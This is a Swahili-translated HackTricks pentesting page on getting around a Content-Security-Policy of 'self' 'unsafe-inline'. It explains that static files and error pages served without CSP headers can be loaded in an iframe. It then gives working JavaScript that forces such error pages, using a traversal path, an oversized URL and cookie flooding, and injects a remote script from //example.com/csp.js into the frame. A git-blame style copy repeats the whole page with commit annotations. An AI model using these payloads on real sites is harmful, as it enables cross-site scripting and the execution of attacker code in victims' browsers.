hacktricks/pentesting-web/content-security-policy-csp-bypass/csp-bypass-self-+-unsafe-inline-with-iframes.md

<details>

<summary><strong>Jifunze kuhusu kudukua AWS kutoka sifuri hadi shujaa na</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (Mtaalam wa Timu Nyekundu ya AWS ya HackTricks)</strong></a><strong>!</strong></summary>

Njia nyingine za kusaidia HackTricks:

* Ikiwa unataka kuona **kampuni yako ikionekana kwenye HackTricks** au **kupakua HackTricks kwa muundo wa PDF** Angalia [**MPANGO WA KUJIUNGA**](https://github.com/sponsors/carlospolop)!
* Pata [**swag rasmi ya PEASS & HackTricks**](https://peass.creator-spring.com)
* Gundua [**Familia ya PEASS**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa [**NFTs**](https://opensea.io/collection/the-peass-family) ya kipekee
* **Jiunge na** 💬 [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au [**kikundi cha telegram**](https://t.me/peass) au **tufuate** kwenye **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **Shiriki mbinu zako za kudukua kwa kuwasilisha PRs kwenye** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repos za github.

</details>


A configuration such as:
```
Content-Security-Policy: default-src 'self' 'unsafe-inline';
```
Inazuia matumizi ya kazi yoyote inayotekeleza nambari iliyotumwa kama herufi. Kwa mfano: `eval, setTimeout, setInterval` zote zitazuiliwa kwa sababu ya mipangilio ya `unsafe-eval`.

Yaliyomo kutoka vyanzo vya nje pia yatazuiliwa, ikiwa ni pamoja na picha, CSS, WebSockets, na, hasa, JS.

### Kupitia Nakala na Picha

Imeonekana kuwa vivinjari vya kisasa hubadilisha picha na maandishi kuwa HTML ili kuboresha kuonyesha kwao (kwa mfano, kuweka milango, kati, nk.). Kwa hivyo, ikiwa picha au faili ya maandishi, kama vile `favicon.ico` au `robots.txt`, inafunguliwa kupitia `iframe`, inaonyeshwa kama HTML. Kwa umuhimu, kurasa hizi mara nyingi hazina vichwa vya CSP na huenda hazijumuishi X-Frame-Options, kuruhusu utekelezaji wa JavaScript wa kiholela kutoka kwao:
```javascript
frame=document.createElement("iframe");
frame.src="/css/bootstrap.min.css";
document.body.appendChild(frame);
script=document.createElement('script');
script.src='//example.com/csp.js';
window.frames[0].document.head.appendChild(script);
```
### Kupitia Makosa

Vivyo hivyo, majibu ya makosa, kama vile faili za maandishi au picha, kawaida huja bila vichwa vya CSP na yanaweza kukosa X-Frame-Options. Makosa yanaweza kusababisha kupakia ndani ya kisanduku cha iframe, kuruhusu hatua zifuatazo:
```javascript
// Inducing an nginx error
frame=document.createElement("iframe");
frame.src="/%2e%2e%2f";
document.body.appendChild(frame);

// Triggering an error with a long URL
frame=document.createElement("iframe");
frame.src="/"+"A".repeat(20000);
document.body.appendChild(frame);

// Generating an error via extensive cookies
for(var i=0;i<5;i++){document.cookie=i+"="+"a".repeat(4000)};
frame=document.createElement("iframe");
frame.src="/";
document.body.appendChild(frame);
// Removal of cookies is crucial post-execution
for(var i=0;i<5;i++){document.cookie=i+"="}
```
Baada ya kuzindua mojawapo ya hali zilizotajwa, utekelezaji wa JavaScript ndani ya kioo cha mtandao unaweza kufanikiwa kama ifuatavyo:
```javascript
script=document.createElement('script');
script.src='//example.com/csp.js';
window.frames[0].document.head.appendChild(script);
```
## Marejeo

* [https://lab.wallarm.com/how-to-trick-csp-in-letting-you-run-whatever-you-want-73cb5ff428aa/](https://lab.wallarm.com/how-to-trick-csp-in-letting-you-run-whatever-you-want-73cb5ff428aa/)


<details>

<summary><strong>Jifunze kuhusu kudukua AWS kutoka sifuri hadi shujaa na</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (Mtaalam wa Timu Nyekundu ya AWS ya HackTricks)</strong></a><strong>!</strong></summary>

Njia nyingine za kusaidia HackTricks:

* Ikiwa unataka kuona **kampuni yako inatangazwa kwenye HackTricks** au **kupakua HackTricks kwa muundo wa PDF** Angalia [**MPANGO WA KUJIUNGA**](https://github.com/sponsors/carlospolop)!
* Pata [**swag rasmi ya PEASS & HackTricks**](https://peass.creator-spring.com)
* Gundua [**The PEASS Family**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa [**NFTs**](https://opensea.io/collection/the-peass-family) ya kipekee
* **Jiunge na** 💬 [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au [**kikundi cha telegram**](https://t.me/peass) au **tufuate** kwenye **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **Shiriki mbinu zako za kudukua kwa kuwasilisha PR kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repos za github.

</details>
Ad hacktricks sponsoring 2022-04-28 16:01:33 +00:00			`<details>`

Translated to Swahili 2024-02-11 02:13:58 +00:00			`<summary><strong>Jifunze kuhusu kudukua AWS kutoka sifuri hadi shujaa na</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (Mtaalam wa Timu Nyekundu ya AWS ya HackTricks)</strong></a><strong>!</strong></summary>`
Ad hacktricks sponsoring 2022-04-28 16:01:33 +00:00
Translated to Swahili 2024-02-11 02:13:58 +00:00			`Njia nyingine za kusaidia HackTricks:`
Ad hacktricks sponsoring 2022-04-28 16:01:33 +00:00
Translated to Swahili 2024-02-11 02:13:58 +00:00			`* Ikiwa unataka kuona kampuni yako ikionekana kwenye HackTricks au kupakua HackTricks kwa muundo wa PDF Angalia [MPANGO WA KUJIUNGA](https://github.com/sponsors/carlospolop)!`
			`* Pata [swag rasmi ya PEASS & HackTricks](https://peass.creator-spring.com)`
			`* Gundua [Familia ya PEASS](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa [NFTs](https://opensea.io/collection/the-peass-family) ya kipekee`
			`* Jiunge na 💬 [Kikundi cha Discord](https://discord.gg/hRep4RUj7f) au [kikundi cha telegram](https://t.me/peass) au tufuate kwenye Twitter 🐦 [@carlospolopm](https://twitter.com/hacktricks_live).`
			`* Shiriki mbinu zako za kudukua kwa kuwasilisha PRs kwenye [HackTricks](https://github.com/carlospolop/hacktricks) na [HackTricks Cloud](https://github.com/carlospolop/hacktricks-cloud) repos za github.`
Ad hacktricks sponsoring 2022-04-28 16:01:33 +00:00
			`</details>`


GitBook: [#3108] No subject 2022-04-19 22:38:50 +00:00			`A configuration such as:`
			```
a 2024-02-07 04:05:50 +00:00			`Content-Security-Policy: default-src 'self' 'unsafe-inline';`
GitBook: [#3108] No subject 2022-04-19 22:38:50 +00:00			```
Translated to Swahili 2024-02-11 02:13:58 +00:00			Inazuia matumizi ya kazi yoyote inayotekeleza nambari iliyotumwa kama herufi. Kwa mfano: `eval, setTimeout, setInterval` zote zitazuiliwa kwa sababu ya mipangilio ya `unsafe-eval`.
GitBook: [#3108] No subject 2022-04-19 22:38:50 +00:00
Translated to Swahili 2024-02-11 02:13:58 +00:00			`Yaliyomo kutoka vyanzo vya nje pia yatazuiliwa, ikiwa ni pamoja na picha, CSS, WebSockets, na, hasa, JS.`
GitBook: [#3108] No subject 2022-04-19 22:38:50 +00:00
Translated to Swahili 2024-02-11 02:13:58 +00:00			`### Kupitia Nakala na Picha`
GitBook: [#3108] No subject 2022-04-19 22:38:50 +00:00
Translated to Swahili 2024-02-11 02:13:58 +00:00			Imeonekana kuwa vivinjari vya kisasa hubadilisha picha na maandishi kuwa HTML ili kuboresha kuonyesha kwao (kwa mfano, kuweka milango, kati, nk.). Kwa hivyo, ikiwa picha au faili ya maandishi, kama vile `favicon.ico` au `robots.txt`, inafunguliwa kupitia `iframe`, inaonyeshwa kama HTML. Kwa umuhimu, kurasa hizi mara nyingi hazina vichwa vya CSP na huenda hazijumuishi X-Frame-Options, kuruhusu utekelezaji wa JavaScript wa kiholela kutoka kwao:
GitBook: [#3108] No subject 2022-04-19 22:38:50 +00:00			```javascript
			`frame=document.createElement("iframe");`
			`frame.src="/css/bootstrap.min.css";`
			`document.body.appendChild(frame);`
			`script=document.createElement('script');`
a 2024-02-07 04:05:50 +00:00			`script.src='//example.com/csp.js';`
GitBook: [#3108] No subject 2022-04-19 22:38:50 +00:00			`window.frames[0].document.head.appendChild(script);`
			```
Translated to Swahili 2024-02-11 02:13:58 +00:00			`### Kupitia Makosa`
GitBook: [#3108] No subject 2022-04-19 22:38:50 +00:00
Translated to Swahili 2024-02-11 02:13:58 +00:00			`Vivyo hivyo, majibu ya makosa, kama vile faili za maandishi au picha, kawaida huja bila vichwa vya CSP na yanaweza kukosa X-Frame-Options. Makosa yanaweza kusababisha kupakia ndani ya kisanduku cha iframe, kuruhusu hatua zifuatazo:`
GitBook: [#3108] No subject 2022-04-19 22:38:50 +00:00			```javascript
a 2024-02-07 04:05:50 +00:00			`// Inducing an nginx error`
GitBook: [#3108] No subject 2022-04-19 22:38:50 +00:00			`frame=document.createElement("iframe");`
			`frame.src="/%2e%2e%2f";`
			`document.body.appendChild(frame);`

a 2024-02-07 04:05:50 +00:00			`// Triggering an error with a long URL`
GitBook: [#3108] No subject 2022-04-19 22:38:50 +00:00			`frame=document.createElement("iframe");`
			`frame.src="/"+"A".repeat(20000);`
			`document.body.appendChild(frame);`

a 2024-02-07 04:05:50 +00:00			`// Generating an error via extensive cookies`
GitBook: [#3108] No subject 2022-04-19 22:38:50 +00:00			`for(var i=0;i<5;i++){document.cookie=i+"="+"a".repeat(4000)};`
			`frame=document.createElement("iframe");`
			`frame.src="/";`
			`document.body.appendChild(frame);`
a 2024-02-07 04:05:50 +00:00			`// Removal of cookies is crucial post-execution`
GitBook: [#3108] No subject 2022-04-19 22:38:50 +00:00			`for(var i=0;i<5;i++){document.cookie=i+"="}`
			```
Translated to Swahili 2024-02-11 02:13:58 +00:00			`Baada ya kuzindua mojawapo ya hali zilizotajwa, utekelezaji wa JavaScript ndani ya kioo cha mtandao unaweza kufanikiwa kama ifuatavyo:`
GitBook: [#3108] No subject 2022-04-19 22:38:50 +00:00			```javascript
			`script=document.createElement('script');`
a 2024-02-07 04:05:50 +00:00			`script.src='//example.com/csp.js';`
GitBook: [#3108] No subject 2022-04-19 22:38:50 +00:00			`window.frames[0].document.head.appendChild(script);`
			```
Translated to Swahili 2024-02-11 02:13:58 +00:00			`## Marejeo`
GitBook: [#3108] No subject 2022-04-19 22:38:50 +00:00
			`* [https://lab.wallarm.com/how-to-trick-csp-in-letting-you-run-whatever-you-want-73cb5ff428aa/](https://lab.wallarm.com/how-to-trick-csp-in-letting-you-run-whatever-you-want-73cb5ff428aa/)`
Ad hacktricks sponsoring 2022-04-28 16:01:33 +00:00

			`<details>`

Translated to Swahili 2024-02-11 02:13:58 +00:00			`<summary><strong>Jifunze kuhusu kudukua AWS kutoka sifuri hadi shujaa na</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (Mtaalam wa Timu Nyekundu ya AWS ya HackTricks)</strong></a><strong>!</strong></summary>`
Ad hacktricks sponsoring 2022-04-28 16:01:33 +00:00
Translated to Swahili 2024-02-11 02:13:58 +00:00			`Njia nyingine za kusaidia HackTricks:`
Ad hacktricks sponsoring 2022-04-28 16:01:33 +00:00
Translated to Swahili 2024-02-11 02:13:58 +00:00			`* Ikiwa unataka kuona kampuni yako inatangazwa kwenye HackTricks au kupakua HackTricks kwa muundo wa PDF Angalia [MPANGO WA KUJIUNGA](https://github.com/sponsors/carlospolop)!`
			`* Pata [swag rasmi ya PEASS & HackTricks](https://peass.creator-spring.com)`
			`* Gundua [The PEASS Family](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa [NFTs](https://opensea.io/collection/the-peass-family) ya kipekee`
			`* Jiunge na 💬 [Kikundi cha Discord](https://discord.gg/hRep4RUj7f) au [kikundi cha telegram](https://t.me/peass) au tufuate kwenye Twitter 🐦 [@carlospolopm](https://twitter.com/hacktricks_live).`
			`* Shiriki mbinu zako za kudukua kwa kuwasilisha PR kwa [HackTricks](https://github.com/carlospolop/hacktricks) na [HackTricks Cloud](https://github.com/carlospolop/hacktricks-cloud) repos za github.`
Ad hacktricks sponsoring 2022-04-28 16:01:33 +00:00
			`</details>`